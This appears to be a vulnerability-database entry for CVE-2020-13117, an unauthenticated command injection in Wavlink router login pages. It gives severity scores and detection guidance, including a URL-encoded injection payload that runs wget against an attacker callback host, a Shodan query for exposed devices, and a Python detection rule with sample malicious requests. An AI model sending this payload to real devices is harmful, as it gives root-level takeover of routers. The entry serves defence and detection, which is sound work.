CVE-2020-13117
published 2021-02-09


Priority: P1, 93, critical, 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: ITW, EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 68.79% (99.3th percentile)

Wavlink WN575A4, WN579X3, and WN530G3A devices through 2020-05-15 allow unauthenticated remote users to inject commands via the key parameter in a login request.

Affected

2 ranges

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wavlink | wn575a4_firmware | <= 2020-05-15 | |
| wavlink | wn579x3_firmware | <= 2020-05-15 | |

Detection & IOCs (extracted from sources)

path: /cgi-bin/login.cgi
command: key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23
other: shodan-query: http.title:"Wi-Fi APP Login"
  • Look for POST requests to /cgi-bin/login.cgi containing shell metacharacters (backtick, semicolon, single-quote) in the 'key' parameter, indicating command injection attempts.
  • The exploit payload URL-encodes shell injection: key=';`wget http://<attacker>;`;# — detect URL-encoded backtick (%60) and semicolon (%3B) sequences in the key parameter of login.cgi POST bodies.
  • Wavlink devices exposed on the internet can be identified via Shodan using the title 'Wi-Fi APP Login'; monitor for exploitation attempts against such assets.
  • Successful exploitation response body contains 'parent.location.replace' — use this as a response-side indicator when correlating with malicious login.cgi POST requests.
  • GreyNoise tagged active in-the-wild scanning for this CVE as 'Wavlink CVE-2020-13117 RCE Attempt' — use GreyNoise tag filtering to identify scanning IPs.
  • The vulnerability affects multiple Wavlink device models; confirmed on WN575A4 and WN579X3, but WN530G3A and potentially other products are also listed as affected.
  • The injection is unauthenticated and executes as root, making network-exposed Wavlink login pages an immediate critical risk requiring no prior credentials.
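
The request-side and response-side indicators above can be combined into one triage rule. The following is an added example, not code from this page or from any of its sources; the event schema (method, url, body, response_body), the sample events and the `username` field are constructed for illustration.

```python
from urllib.parse import parse_qs, unquote_plus, urlsplit

LOGIN_PATH = "/cgi-bin/login.cgi"            # path listed on the page
SHELL_META = set("`;'")                      # backtick, semicolon, single quote
SUCCESS_MARKER = "parent.location.replace"   # response-side indicator from the page


def classify(event):
    """Return 'ignore', 'attempt' or 'likely-success' for one HTTP event.

    `event` is a dict with method, url, body and response_body keys
    (assumed schema; map your proxy or WAF fields onto it).
    """
    if event["method"].upper() != "POST":
        return "ignore"
    if urlsplit(event["url"]).path != LOGIN_PATH:
        return "ignore"
    # parse_qs URL-decodes once, so %60/%3B/%27 and literal characters both
    # match. separator="&" keeps a literal ';' inside the value.
    params = parse_qs(event["body"], keep_blank_values=True, separator="&")
    suspicious = False
    for value in params.get("key", []):
        # Decode a second time to catch double-encoded input (%2560 -> %60 -> `).
        if SHELL_META & (set(value) | set(unquote_plus(value))):
            suspicious = True
    if not suspicious:
        return "ignore"
    if SUCCESS_MARKER in event.get("response_body", ""):
        return "likely-success"
    return "attempt"


# Constructed sample events; hosts and field values are placeholders.
ENCODED = "key=%27%3B%60wget+http%3A%2F%2Fexample.invalid%3B%60%3B%23"
SAMPLES = [
    {"method": "POST", "url": "http://192.0.2.10/cgi-bin/login.cgi",
     "body": "username=admin&key=CorrectHorse9", "response_body": "<html>"},
    {"method": "POST", "url": "http://192.0.2.10/cgi-bin/login.cgi",
     "body": ENCODED, "response_body": "<html>error</html>"},
    {"method": "POST", "url": "http://192.0.2.10/cgi-bin/login.cgi",
     "body": ENCODED, "response_body": "<script>parent.location.replace('/')</script>"},
    {"method": "GET", "url": "http://192.0.2.10/cgi-bin/login.cgi?" + ENCODED,
     "body": "", "response_body": ""},
    {"method": "POST", "url": "http://192.0.2.10/cgi-bin/login.cgi",
     "body": "key=%2527%253B%2560x%2560", "response_body": ""},
]


def triage(events):
    """Classify every event, preserving order."""
    return [classify(e) for e in events]
```

A legitimate password that contains a quote or semicolon will also match, so treat 'attempt' as a lead for review and 'likely-success' as the higher-priority result.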

CVSS provenance

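| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| vulncheck | | 9.8 | CRITICAL | |
| vendor_oracle | | 7.5 | MEDIUM | |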